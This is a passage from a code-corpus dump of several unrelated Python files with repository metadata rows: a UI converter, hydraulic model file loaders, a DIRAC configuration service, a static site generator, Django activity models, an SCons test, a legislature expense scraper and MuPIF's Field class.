def get_in_path(self, name, *sub_paths):
name = f'{name}.ui'
return os.path.join(self.base_ui_path, *sub_paths, name)
def get_out_path(self, name, *sub_paths):
name = f'{name}_auto.py'
return os.path.join(self.base_out_path, *sub_paths, name)
def about(self):
name = 'about_dialog'
self.convert(name)
def add_reddit_object(self):
name = 'add_reddit_object_dialog'
self.convert(name)
def main_window(self):
name = 'downloader_for_reddit_gui'
self.convert(name)
def reddit_object_dialog(self):
name = 'reddit_object_settings_dialog'
self.convert(name)
def update_dialog(self):
name = 'update_dialog'
self.convert(name)
def database_dialog(self):
name = 'database_dialog'
self.convert(name, 'database_views')
def filter_input(self):
name = 'filter_input_widget'
self.convert(name, 'database_views')
def filter_widget(self):
name = 'filter_widget'
self.convert(name, 'database_views')
def core_settings(self):
name = 'core_settings_widget'
self.convert(name, 'settings')
def database_settings(self):
name = 'database_settings_widget'
self.convert(name, 'settings')
def display_settings(self):
name = 'display_settings_widget'
self.convert(name, 'settings')
def download_settings(self):
name = 'download_settings_widget'
self.convert(name, 'settings')
def export_wizard(self):
name = 'export_wizard'
self.convert(name)
def notification_settings(self):
name = 'notification_settings_widget'
self.convert(name, 'settings')
def output_settings(self):
name = 'output_settings_widget'
self.convert(name, 'settings')
def quick_filter_settings(self):
name = 'quick_filter_settings_widget'
self.convert(name, 'settings')
def schedule_settings(self):
name = 'schedule_settings_widget'
self.convert(name, 'settings')
def settings(self):
name = 'settings_dialog'
self.convert(name, 'settings')
def object_info(self):
name = 'object_info_widget'
self.convert(name, 'widgets')
def object_settings(self):
name = 'object_settings_widget'
self.convert(name, 'widgets')
def invalid_dialog(self):
name = 'invalid_reddit_object_dialog'
self.convert(name)
def existing_names_dialog(self):
name = 'existing_names_dialog'
self.convert(name)
def user_auth_wizard(self):
name = 'user_auth_wizard'
self.convert(name)
def main():
try:
command = sys.argv[1]
except IndexError:
print('No class specified')
command = input('GUI Name (or number): ')
converter = Converter(command)
converter.run()
if __name__ == '__main__':
main()
| gpl-3.0 | 8,101,822,332,021,041,000 | 26.433155 | 116 | 0.571345 | false |
duncan-r/SHIP | ship/utils/fileloaders/fileloader.py | 1 | 2254 | """
Summary:
Main file loader for the API. This offers convenience methods to make it
simple to load any type of file from one place.
Author:
Duncan Runnacles
Created:
01 Apr 2016
Copyright:
Duncan Runnacles 2016
TODO:
Updates:
"""
from __future__ import unicode_literals
from ship.utils import utilfunctions as uuf
from ship.utils.fileloaders import tuflowloader
from ship.utils.fileloaders import iefloader
from ship.utils.fileloaders import datloader
import logging
logger = logging.getLogger(__name__)
"""logging references with a __name__ set to this module."""
class FileLoader(object):
"""
"""
def __init__(self):
"""
"""
self._known_files = {'ief': iefloader.IefLoader,
'tcf': tuflowloader.TuflowLoader,
'dat': datloader.DatLoader,
'ied': datloader.DatLoader}
self.warnings = []
def loadFile(self, filepath, arg_dict={}):
"""Load a file from disk.
Args:
filepath (str): the path to the file to load.
arg_dict={}(Dict): contains keyword referenced arguments needed by
any of the loaders. E.g. the TuflowLoader can take some
scenario values.
Returns:
The object created by the individual file loaders. E.g. for .dat
files this will be an IsisUnitCollection. See the individual
ALoader implementations for details of return types.
Raises:
AttributeError: if the file type is not tcf/dat/ief/ied.
See Also:
:class:'ALoader'
:class:'IefLoader'
:class:'TuflowLoader'
:class:'DatLoader'
"""
ext = uuf.fileExtensionWithoutPeriod(filepath)
if not ext.lower() in self._known_files:
logger.error('File type %s is not currently supported for loading' % ext)
raise AttributeError('File type %s is not currently supported for loading' % ext)
loader = self._known_files[ext]()
contents = loader.loadFile(filepath, arg_dict)
self.warnings = loader.warnings
del loader
return contents
| mit | 366,836,191,615,290,940 | 26.82716 | 93 | 0.60071 | false |
arrabito/DIRAC | ConfigurationSystem/Service/ConfigurationHandler.py | 1 | 3918 | """ The CS! (Configuration Service)
"""
__RCSID__ = "$Id$"
from DIRAC.Core.Utilities.ReturnValues import S_OK, S_ERROR
from DIRAC.ConfigurationSystem.private.ServiceInterface import ServiceInterface
from DIRAC.Core.DISET.RequestHandler import RequestHandler
from DIRAC.Core.Utilities import DErrno
gServiceInterface = None
gPilotSynchronizer = None
def initializeConfigurationHandler(serviceInfo):
global gServiceInterface
gServiceInterface = ServiceInterface(serviceInfo['URL'])
return S_OK()
class ConfigurationHandler(RequestHandler):
""" The CS handler
"""
types_getVersion = []
def export_getVersion(self):
return S_OK(gServiceInterface.getVersion())
types_getCompressedData = []
def export_getCompressedData(self):
sData = gServiceInterface.getCompressedConfigurationData()
return S_OK(sData)
types_getCompressedDataIfNewer = [basestring]
def export_getCompressedDataIfNewer(self, sClientVersion):
sVersion = gServiceInterface.getVersion()
retDict = {'newestVersion': sVersion}
if sClientVersion < sVersion:
retDict['data'] = gServiceInterface.getCompressedConfigurationData()
return S_OK(retDict)
types_publishSlaveServer = [basestring]
def export_publishSlaveServer(self, sURL):
gServiceInterface.publishSlaveServer(sURL)
return S_OK()
types_commitNewData = [basestring]
def export_commitNewData(self, sData):
global gPilotSynchronizer
credDict = self.getRemoteCredentials()
if 'DN' not in credDict or 'username' not in credDict:
return S_ERROR("You must be authenticated!")
res = gServiceInterface.updateConfiguration(sData, credDict['username'])
if not res['OK']:
return res
# Check the flag for updating the pilot 3 JSON file
if self.srv_getCSOption('UpdatePilotCStoJSONFile', False) and gServiceInterface.isMaster():
if gPilotSynchronizer is None:
try:
# This import is only needed for the Master CS service, making it conditional avoids
# dependency on the git client preinstalled on all the servers running CS slaves
from DIRAC.WorkloadManagementSystem.Utilities.PilotCStoJSONSynchronizer import PilotCStoJSONSynchronizer
except ImportError as exc:
self.log.exception("Failed to import PilotCStoJSONSynchronizer", repr(exc))
return S_ERROR(DErrno.EIMPERR, 'Failed to import PilotCStoJSONSynchronizer')
gPilotSynchronizer = PilotCStoJSONSynchronizer()
return gPilotSynchronizer.sync()
return res
types_writeEnabled = []
def export_writeEnabled(self):
return S_OK(gServiceInterface.isMaster())
types_getCommitHistory = []
def export_getCommitHistory(self, limit=100):
if limit > 100:
limit = 100
history = gServiceInterface.getCommitHistory()
if limit:
history = history[:limit]
return S_OK(history)
types_getVersionContents = [list]
def export_getVersionContents(self, versionList):
contentsList = []
for version in versionList:
retVal = gServiceInterface.getVersionContents(version)
if retVal['OK']:
contentsList.append(retVal['Value'])
else:
return S_ERROR("Can't get contents for version %s: %s" % (version, retVal['Message']))
return S_OK(contentsList)
types_rollbackToVersion = [basestring]
def export_rollbackToVersion(self, version):
retVal = gServiceInterface.getVersionContents(version)
if not retVal['OK']:
return S_ERROR("Can't get contents for version %s: %s" % (version, retVal['Message']))
credDict = self.getRemoteCredentials()
if 'DN' not in credDict or 'username' not in credDict:
return S_ERROR("You must be authenticated!")
return gServiceInterface.updateConfiguration(retVal['Value'],
credDict['username'],
updateVersionOption=True)
| gpl-3.0 | -4,709,197,104,656,305,000 | 33.368421 | 114 | 0.710822 | false |
lunixbochs/nullstatic | gen.py | 1 | 2581 | #!/usr/bin/env python2
from collections import defaultdict
from datetime import date, datetime
from email.Utils import formatdate
import frontmatter
import jinja2
import markdown
import os
import sys
import time
import yaml
@jinja2.contextfilter
def _render(context, data):
return env.from_string(data['source']).render(**context)
def datekey(entry):
d = entry.get('date', date.min)
if isinstance(d, date):
d = datetime.combine(d, datetime.min.time())
return d
def strip_path(base, path):
return path.replace(base, '', 1).lstrip(os.sep)
def gen(base, out):
env = jinja2.Environment(trim_blocks=True, lstrip_blocks=True, loader=jinja2.FileSystemLoader(base))
env.filters['render'] = _render
env.filters['markdown'] = markdown.markdown
env.filters['date'] = lambda x: x.strftime('%Y-%m-%d')
env.filters['rfc822'] = lambda x: formatdate(time.mktime(x.timetuple()))
env.filters['datesort'] = lambda x: sorted(x, key=lambda k: datekey(k))
tree = defaultdict(list)
for root, dirs, files in os.walk(base):
root = strip_path(base, root)
for name in files:
if name.endswith('.j2'):
path = os.path.join(base, root, name)
post = frontmatter.load(path)
data = {'name': name.rsplit('.', 1)[0], 'src': path, 'source': post.content}
data.update(post)
data['ext'] = data.get('ext', (os.path.splitext(data.get('render', ''))[1] if not '.' in data['name'] else ''))
data['url'] = data.get('url', data['name']) + data['ext']
data['dst'] = os.path.join(out, os.path.dirname(strip_path(base, path)), data['url'])
tree[root].append(data)
for template in (t for ts in tree.values() for t in ts):
source, render = map(template.get, ('source', 'render'), (None, ''))
if source is not None:
if render:
source = open(os.path.join(base, render), 'r').read().decode('utf-8')
ctx = {cat: templates for cat, templates in tree.items() if cat}
ctx.update(tree=tree, **template)
data = env.from_string(source).render(**ctx)
dstdir = os.path.dirname(template['dst'])
if not os.path.exists(dstdir):
os.makedirs(dstdir)
with open(template['dst'], 'w') as o:
o.write(data.encode('utf-8'))
if __name__ == '__main__':
import sys
if len(sys.argv) != 3:
print('Usage: gen.py <src> <out>')
sys.exit(1)
gen(*sys.argv[1:])
| mit | -623,981,896,369,554,700 | 37.522388 | 127 | 0.586594 | false |
owais/django-simple-activity | simple_activity/models.py | 1 | 1965 | from django.db import models
from django.utils.timezone import now
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from filtered_contenttypes.fields import FilteredGenericForeignKey
from django_pgjson.fields import JsonBField
from .managers import ActionManager
from . import settings as app_settings
from . import registry
def _default_action_meta():
return {}
class Action(models.Model):
item_type = models.ForeignKey(ContentType, related_name='actions')
item_id = models.PositiveIntegerField()
item = FilteredGenericForeignKey('item_type', 'item_id')
target_type = models.ForeignKey(ContentType, blank=True, null=True,
related_name='target_actions')
target_id = models.PositiveIntegerField(blank=True, null=True)
target = FilteredGenericForeignKey('target_type', 'target_id')
actor = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='activity')
verb = models.CharField(max_length=23,
choices=registry.as_model_choices())
published = models.DateTimeField(auto_now_add=True)
meta = JsonBField(default=_default_action_meta, blank=True)
objects = ActionManager()
class Meta:
abstract = app_settings.get('ACTION_MODEL') != 'simple_activity.Action'
ordering = ('-published',)
@classmethod
def add_action(klass, verb, actor, item, target=None, published=None,
meta={}):
if not registry.is_valid(verb):
raise ValueError('`{}` not a valid verb.'.format(verb))
published = published or now()
create_kwargs = {'actor': actor, 'item': item, 'verb': verb.code}
if target:
create_kwargs['target'] = target
create_kwargs['published'] = published
klass.objects.create(**create_kwargs)
@property
def verb_object(self):
return registry.get_from_code(self.verb)
| bsd-2-clause | 2,345,284,087,180,824,000 | 34.727273 | 80 | 0.672774 | false |
EmanueleCannizzaro/scons | test/Clean/Option.py | 1 | 2620 | #!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/Clean/Option.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
"""
Verify that {Set,Get}Option('clean') works correctly to control
cleaning behavior.
"""
import os
import TestSCons
_python_ = TestSCons._python_
test = TestSCons.TestSCons()
test.write('build.py', r"""
import sys
contents = open(sys.argv[2], 'rb').read()
file = open(sys.argv[1], 'wb')
file.write(contents)
file.close()
""")
test.write('SConstruct', """
B = Builder(action = r'%(_python_)s build.py $TARGETS $SOURCES')
env = Environment(BUILDERS = { 'B' : B })
env.B(target = 'foo.out', source = 'foo.in')
mode = ARGUMENTS.get('MODE')
if mode == 'not':
assert not GetOption('clean')
if mode == 'set-zero':
assert GetOption('clean')
SetOption('clean', 0)
assert GetOption('clean')
if mode == 'set-one':
assert not GetOption('clean')
SetOption('clean', 1)
assert GetOption('clean')
""" % locals())
test.write('foo.in', '"Foo", I say!\n')
test.run(arguments='foo.out MODE=not')
test.must_match(test.workpath('foo.out'), '"Foo", I say!\n')
test.run(arguments='-c foo.out MODE=set-zero')
test.must_not_exist(test.workpath('foo.out'))
test.run(arguments='foo.out MODE=none')
test.must_match(test.workpath('foo.out'), '"Foo", I say!\n')
test.run(arguments='foo.out MODE=set-one')
test.must_not_exist(test.workpath('foo.out'))
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| mit | -4,647,620,131,027,711,000 | 29.465116 | 94 | 0.711832 | false |
olhoneles/olhoneles | montanha/management/commands/collectors/algo.py | 1 | 12094 | # -*- coding: utf-8 -*-
#
# Copyright (©) 2010-2013 Estêvão Samuel Procópio
# Copyright (©) 2010-2013 Gustavo Noronha Silva
# Copyright (©) 2013 Marcelo Jorge Vieira
# Copyright (©) 2014 Wilson Pinto Júnior
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import json
import operator
import os
import re
import rows
from datetime import datetime
from io import BytesIO
from cStringIO import StringIO
from cachetools import Cache, cachedmethod
from django.core.files import File
from basecollector import BaseCollector
from montanha.models import (
Institution, Legislature, PoliticalParty, Legislator, ExpenseNature,
ArchivedExpense, Mandate
)
class ALGO(BaseCollector):
TITLE_REGEX = re.compile(r'\d+ - (.*)')
MONEY_RE = re.compile(r'([0-9.,]+)[,.]([0-9]{2})$')
def __init__(self, *args, **kwargs):
super(ALGO, self).__init__(*args, **kwargs)
self.base_url = 'http://al.go.leg.br'
self.institution, _ = Institution.objects.get_or_create(
siglum='ALGO', name=u'Assembléia Legislativa do Estado de Goiás'
)
self.legislature, _ = Legislature.objects.get_or_create(
institution=self.institution,
date_start=datetime(2015, 1, 1),
date_end=datetime(2018, 12, 31)
)
self.list_of_legislators_cache = Cache(1024)
self.expenses_nature_cached = {}
def _normalize_party_siglum(self, siglum):
names_map = {
'SDD': 'Solidariedade',
}
return names_map.get(siglum, siglum)
def update_legislators(self):
url = self.base_url + '/deputado/'
html = self.retrieve_uri(url, post_process=False, force_encoding='utf-8')
rows_xpath = u'//tbody/tr'
fields_xpath = {
u'nome': u'./td[position()=1]/a/text()',
u'url': u'./td[position()=1]/a/@href',
u'party': u'./td[position()=2]/text()',
u'telefone': u'./td[position()=3]/text()',
u'fax': u'./td[position()=4]/text()',
u'email': u'./td[position()=5]/a[position()=1]/img/@title',
}
table = rows.import_from_xpath(BytesIO(html.encode('utf-8')), rows_xpath, fields_xpath)
url_regex = re.compile(r'.*id/(\d+)')
email_regex = re.compile(r'Email: (.*)')
for row in table:
_id = url_regex.match(row.url).group(1)
email = None
if row.email:
email = email_regex.match(row.email).group(1).strip()
party_siglum = self._normalize_party_siglum(row.party)
party, party_created = PoliticalParty.objects.get_or_create(
siglum=party_siglum
)
self.debug(u'New party: {0}'.format(party))
legislator, created = Legislator.objects.get_or_create(name=row.nome)
legislator.site = self.base_url + row.url
legislator.email = email
legislator.save()
if created:
self.debug(u'New legislator: {0}'.format(legislator))
else:
self.debug(u'Found existing legislator: {0}'.format(legislator))
self.mandate_for_legislator(legislator, party, original_id=_id)
@classmethod
def parse_title(self, title):
if '-' in title:
match = self.TITLE_REGEX.search(title)
if match:
return match.group(1).encode('utf-8')
return title.encode('utf-8')
@classmethod
def parse_money(self, value):
match = self.MONEY_RE.search(value)
if match:
return float('{0}.{1}'.format(
match.group(1).replace('.', '').replace(',', ''),
match.group(2)
))
else:
raise ValueError('Cannot convert {0} to float (money)'.format(value))
def get_parlamentar_id(self, year, month, name):
legislators = self.get_list_of_legislators(year, month)
legislators = [i for i in legislators if i['nome'] == name]
if not legislators:
return
return legislators[0]['id']
@cachedmethod(operator.attrgetter('list_of_legislators_cache'))
def get_list_of_legislators(self, year, month):
url = '{0}/transparencia/verbaindenizatoria/listardeputados?ano={1}&mes={2}'.format(
self.base_url,
year,
month,
)
data = json.loads(self.retrieve_uri(url, force_encoding='utf8').text)
return data['deputados']
def find_data_for_month(self, mandate, year, month):
parlamentar_id = self.get_parlamentar_id(year, month, mandate.legislator.name)
if not parlamentar_id:
self.debug(
u'Failed to discover parlamentar_id for year={0}, month={1}, legislator={2}'.format(
year, month, mandate.legislator.name,
)
)
raise StopIteration
url = '{0}/transparencia/verbaindenizatoria/exibir?ano={1}&mes={2}&parlamentar_id={3}'.format(
self.base_url, year, month, parlamentar_id
)
data = self.retrieve_uri(url, force_encoding='utf8')
if u'parlamentar não prestou contas para o mês' in data.text:
self.debug(u'not found data for: {0} -> {1}/{2}'.format(
mandate.legislator, year, month
))
raise StopIteration
container = data.find('div', id='verba')
if not container:
self.debug('div#verba not found')
table = container.find('table', recursive=False)
if not table:
self.debug('table.tabela-verba-indenizatoria not found')
raise StopIteration
group_trs = table.findAll('tr', {'class': 'verba_titulo'})
for tr in group_trs:
budget_title = self.parse_title(tr.text)
budget_subtitle = None
while True:
tr = tr.findNext('tr')
if not tr:
break
tr_class = tr.get('class')
if tr.get('class') == 'verba_titulo':
break
elif tr_class == 'info-detalhe-verba':
for data in self.parse_detale_verba(tr, budget_title, budget_subtitle):
yield data
elif tr_class == 'subtotal':
continue
elif len(tr.findAll('td')) == 3:
tds = tr.findAll('td')
budget_subtitle = self.parse_title(tds[0].text)
next_tr = tr.findNext('tr')
break_classes = ('subtotal', 'info-detalhe-verba', 'verba_titulo')
if next_tr.get('class') in break_classes:
continue
value_presented = self.parse_money(tds[1].text)
value_expensed = self.parse_money(tds[2].text)
if not value_expensed or not value_presented:
continue
data = {
'budget_title': budget_title,
'budget_subtitle': budget_subtitle,
'value_presented': value_presented,
'date': '1/%d/%d' % (month, year),
'value_expensed': value_expensed,
'number': 'Sem número'
}
self.debug(u'Generated JSON: {0}'.format(data))
yield data
def parse_detale_verba(self, elem, budget_title, budget_subtitle):
rows_xpath = u'//tbody/tr'
fields_xpath = {
u'nome': u'./td[position()=1]/text()',
u'cpf_cnpj': u'./td[position()=2]/text()',
u'date': u'./td[position()=3]/text()',
u'number': u'./td[position()=4]/text()',
u'value_presented': u'./td[position()=5]/text()',
u'value_expensed': u'./td[position()=6]/text()',
}
table = rows.import_from_xpath(
BytesIO(str(elem)), rows_xpath, fields_xpath)
for row in table:
data = dict(row.__dict__)
data.update({
'budget_title': budget_title,
'budget_subtitle': budget_subtitle,
'cpf_cnpj': self.normalize_cnpj_or_cpf(row.cpf_cnpj),
'value_presented': self.parse_money(row.value_presented),
'value_expensed': self.parse_money(row.value_expensed),
})
self.debug(u'Generated JSON: {0}'.format(data))
yield data
def get_or_create_expense_nature(self, name):
if name not in self.expenses_nature_cached:
try:
nature = ExpenseNature.objects.get(name=name)
except ExpenseNature.DoesNotExist:
nature = ExpenseNature(name=name)
nature.save()
self.expenses_nature_cached[name] = nature
return self.expenses_nature_cached[name]
def update_data_for_month(self, mandate, year, month):
for data in self.find_data_for_month(mandate, year, month):
nature = self.get_or_create_expense_nature(
'{0}: {1}'.format(data['budget_title'], data['budget_subtitle'])
)
name = data.get('nome') or 'Sem nome'
no_identifier = u'Sem CPF/CNPJ ({0})'.format(name)
cpf_cnpj = data.get('cpf_cnpj', no_identifier)
supplier = self.get_or_create_supplier(cpf_cnpj, name)
date = datetime.strptime(data['date'], '%d/%m/%Y')
expense = ArchivedExpense(
number=data.get('number', ''),
nature=nature,
date=date,
value=data['value_presented'],
expensed=data['value_expensed'],
mandate=mandate,
supplier=supplier,
collection_run=self.collection_run,
)
expense.save()
def update_images(self):
mandates = Mandate.objects.filter(legislature=self.legislature, legislator__picture='')
headers = {
'Referer': self.base_url + '/deputado/',
'Origin': self.base_url,
}
deputado_data = self.retrieve_uri(self.base_url + '/deputado/', headers=headers)
for mandate in mandates:
leg = mandate.legislator
found_text = deputado_data.find(text=re.compile(leg.name))
if not found_text:
self.debug(u'Legislator not found in page: {0}'.format(mandate.legislator.name))
continue
tr = found_text.findParents('tr')[0]
tds = tr.findAll('td')
detail_path = tds[0].find('a')['href']
detail_url = self.base_url + detail_path
detail_data = self.retrieve_uri(detail_url, headers=headers)
photo_container = detail_data.find('div', {'class': re.compile(r'foto')})
photo_url = photo_container.find('img')['src']
photo_data = self.retrieve_uri(self.base_url + photo_url, post_process=False, return_content=True)
photo_buffer = StringIO(photo_data)
photo_buffer.seek(0)
leg.picture.save(os.path.basename(photo_url), File(photo_buffer))
leg.save()
self.debug('Saved %s Image URL: {0}'.format(leg.name, photo_url))
else:
self.debug('All legislators have photos')
| agpl-3.0 | -3,635,771,197,065,837,000 | 34.532353 | 110 | 0.552934 | false |
mupif/mupif | mupif/Field.py | 1 | 42683 | #
# MuPIF: Multi-Physics Integration Framework
# Copyright (C) 2010-2015 Borek Patzak
#
# Czech Technical University, Faculty of Civil Engineering,
# Department of Structural Mechanics, 166 29 Prague, Czech Republic
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301 USA
#
from builtins import range
from builtins import object
from . import Cell
from . import FieldID
from . import ValueType
from . import BBox
from . import APIError
from . import MupifObject
from . import Mesh
from .Physics import PhysicalQuantities
from .Physics.PhysicalQuantities import PhysicalQuantity
from numpy import array, arange, random, zeros
import numpy
import copy
import Pyro4
from enum import IntEnum
import logging
log = logging.getLogger()
try:
import cPickle as pickle # faster serialization if available
except:
import pickle
# import logging - never use it here, it causes cPickle.PicklingError: Can't pickle <type 'thread.lock'>: attribute
# lookup thread.lock failed
# debug flag
debug = 0
class FieldType(IntEnum):
"""
Represent the supported values of FieldType, i.e. FT_vertexBased or FT_cellBased.
"""
FT_vertexBased = 1
FT_cellBased = 2
@Pyro4.expose
class Field(MupifObject.MupifObject, PhysicalQuantity):
"""
Representation of field. Field is a scalar, vector, or tensorial
quantity defined on a spatial domain. The field, however is assumed
to be fixed at certain time. The field can be evaluated in any spatial point
belonging to underlying domain.
Derived classes will implement fields defined on common discretizations,
like fields defined on structured/unstructured FE meshes, FD grids, etc.
.. automethod:: __init__
.. automethod:: _evaluate
"""
def __init__(self, mesh, fieldID, valueType, units, time, values=None, fieldType=FieldType.FT_vertexBased, objectID=0, metaData={}):
"""
Initializes the field instance.
:param Mesh.Mesh mesh: Instance of a Mesh class representing the underlying discretization
:param FieldID fieldID: Field type (displacement, strain, temperature ...)
:param ValueType valueType: Type of field values (scalar, vector, tensor). Tensor is a tuple of 9 values. It is changed to 3x3 for VTK output automatically.
:param Physics.PhysicalUnits units: Field value units
:param Physics.PhysicalQuantity time: Time associated with field values
:param values: Field values (format dependent on a particular field type, however each individual value should be stored as tuple, even scalar value)
:type values: list of tuples representing individual values
:param FieldType fieldType: Optional, determines field type (values specified as vertex or cell values), default is FT_vertexBased
:param int objectID: Optional ID of problem object/subdomain to which field is related, default = 0
:param dict metaData: Optionally pass metadata for merging
"""
super(Field, self).__init__()
self.mesh = mesh
self.fieldID = fieldID
self.valueType = valueType
self.time = time
self.uri = None # pyro uri; used in distributed setting
# self.log = logging.getLogger()
self.fieldType = fieldType
self.objectID = objectID
if values is None:
if self.fieldType == FieldType.FT_vertexBased:
ncomponents = mesh.getNumberOfVertices()
else:
ncomponents = mesh.getNumberOfCells()
self.value = zeros((ncomponents, self.getRecordSize()))
else:
self.value = values
if PhysicalQuantities.isPhysicalUnit(units):
self.unit = units
else:
self.unit = PhysicalQuantities.findUnit(units)
self.setMetadata('Units', self.unit.name())
self.setMetadata('Type', 'mupif.Field.Field')
self.setMetadata('Type_ID', str(self.fieldID))
self.setMetadata('FieldType', str(fieldType))
self.setMetadata('ValueType', str(self.valueType))
self.updateMetadata(metaData)
@classmethod
def loadFromLocalFile(cls, fileName):
"""
Alternative constructor which loads instance directly from a Pickle module.
:param str fileName: File name
:return: Returns Field instance
:rtype: Field
"""
return pickle.load(open(fileName, 'rb'))
def getRecordSize(self):
"""
Return the number of scalars per value, depending on :obj:`valueType` passed when constructing the instance.
:return: number of scalars (1,3,9 respectively for scalar, vector, tensor)
:rtype: int
"""
if self.valueType == ValueType.Scalar:
return 1
elif self.valueType == ValueType.Vector:
return 3
elif self.valueType == ValueType.Tensor:
return 9
else:
raise ValueError("Invalid value of Field.valueType (%d)." % self.valueType)
def getMesh(self):
"""
Obtain mesh.
:return: Returns a mesh of underlying discretization
:rtype: Mesh.Mesh
"""
return self.mesh
def getValueType(self):
"""
Returns ValueType of the field, e.g. scalar, vector, tensor.
:return: Returns value type of the receiver
:rtype: ValueType
"""
return self.valueType
def getFieldID(self):
"""
Returns FieldID, e.g. FID_Displacement, FID_Temperature.
:return: Returns field ID
:rtype: FieldID
"""
return self.fieldID
def getFieldIDName(self):
"""
Returns name of the field.
:return: Returns fieldID name
:rtype: string
"""
return self.fieldID.name
def getFieldType(self):
"""
Returns receiver field type (values specified as vertex or cell values)
:return: Returns fieldType id
:rtype: FieldType
"""
return self.fieldType
def getTime(self):
"""
Get time of the field.
:return: Time of field data
:rtype: Physics.PhysicalQuantity
"""
return self.time
def evaluate(self, positions, eps=0.0):
"""
Evaluates the receiver at given spatial position(s).
:param positions: 1D/2D/3D position vectors
:type positions: tuple, a list of tuples
:param float eps: Optional tolerance for probing whether the point belongs to a cell (should really not be used)
:return: field value(s)
:rtype: Physics.PhysicalQuantity with given value or tuple of values
"""
# test if positions is a list of positions
if isinstance(positions, list):
ans = []
for pos in positions:
ans.append(self._evaluate(pos, eps))
return PhysicalQuantity(ans, self.unit)
else:
# single position passed
return PhysicalQuantity(self._evaluate(positions, eps), self.unit)
def _evaluate(self, position, eps):
"""
Evaluates the receiver at a single spatial position.
:param tuple position: 1D/2D/3D position vector
:param float eps: Optional tolerance
:return: field value
:rtype: tuple of doubles
.. note:: This method has some issues related to https://sourceforge.net/p/mupif/tickets/22/ .
"""
cells = self.mesh.giveCellLocalizer().giveItemsInBBox(BBox.BBox([c-eps for c in position], [c+eps for c in position]))
# answer=None
if len(cells):
if self.fieldType == FieldType.FT_vertexBased:
for icell in cells:
try:
if icell.containsPoint(position):
if debug:
log.debug(icell.getVertices())
try:
answer = icell.interpolate(position, [self.value[i.number] for i in icell.getVertices()])
except IndexError:
log.error('Field::evaluate failed, inconsistent data at cell %d' % icell.label)
raise
return answer
except ZeroDivisionError:
print('ZeroDivisionError?')
log.debug(icell.number)
log.debug(position)
icell.debug = 1
log.debug(icell.containsPoint(position), icell.glob2loc(position))
log.error('Field::evaluate - no source cell found for position %s' % str(position))
for icell in cells:
log.debug(icell.number)
log.debug(icell.containsPoint(position))
log.debug(icell.glob2loc(position))
else: # if (self.fieldType == FieldType.FT_vertexBased):
# in case of cell based fields do compute average of cell values containing point
# this typically happens when point is on the shared edge or vertex
count = 0
for icell in cells:
if icell.containsPoint(position):
if debug:
log.debug(icell.getVertices())
try:
tmp = self.value[icell.number]
if count == 0:
answer = list(tmp)
else:
for i in answer:
answer = [x+y for x in answer for y in tmp]
count += 1
except IndexError:
log.error('Field::evaluate failed, inconsistent data at cell %d' % icell.label)
log.error(icell.getVertices())
raise
# end loop over icells
if count == 0:
log.error('Field::evaluate - no source cell found for position %s', str(position))
# for icell in cells:
# log.debug(icell.number, icell.containsPoint(position), icell.glob2loc(position))
else:
answer = [x/count for x in answer]
return answer
else:
# no source cell found
log.error('Field::evaluate - no source cell found for position ' + str(position))
raise ValueError('Field::evaluate - no source cell found for position ' + str(position))
def getVertexValue(self, vertexID):
"""
Returns the value associated with a given vertex.
:param int vertexID: Vertex identifier
:return: The value
:rtype: Physics.PhysicalQuantity
"""
if self.fieldType == FieldType.FT_vertexBased:
return PhysicalQuantity(self.value[vertexID], self.unit)
else:
raise TypeError('Attempt to acces vertex value of cell based field, use evaluate instead')
def getCellValue(self, cellID):
"""
Returns the value associated with a given cell.
:param int cellID: Cell identifier
:return: The value
:rtype: Physics.PhysicalQuantity
"""
if self.fieldType == FieldType.FT_cellBased:
return PhysicalQuantity(self.value[cellID], self.unit)
else:
raise TypeError('Attempt to acces cell value of vertex based field, use evaluate instead')
def _giveValue(self, componentID):
"""
Returns the value associated with a given component (vertex or cell).
Depreceated, use getVertexValue() or getCellValue()
:param int componentID: An identifier of a component: vertexID or cellID
:return: The value
:rtype: Physics.PhysicalQuantity
"""
return PhysicalQuantity(self.value[componentID], self.unit)
def giveValue(self, componentID):
"""
Returns the value associated with a given component (vertex or cell).
:param int componentID: An identifier of a component: vertexID or cellID
:return: The value
:rtype: tuple
"""
return self.value[componentID]
def setValue(self, componentID, value):
"""
Sets the value associated with a given component (vertex or cell).
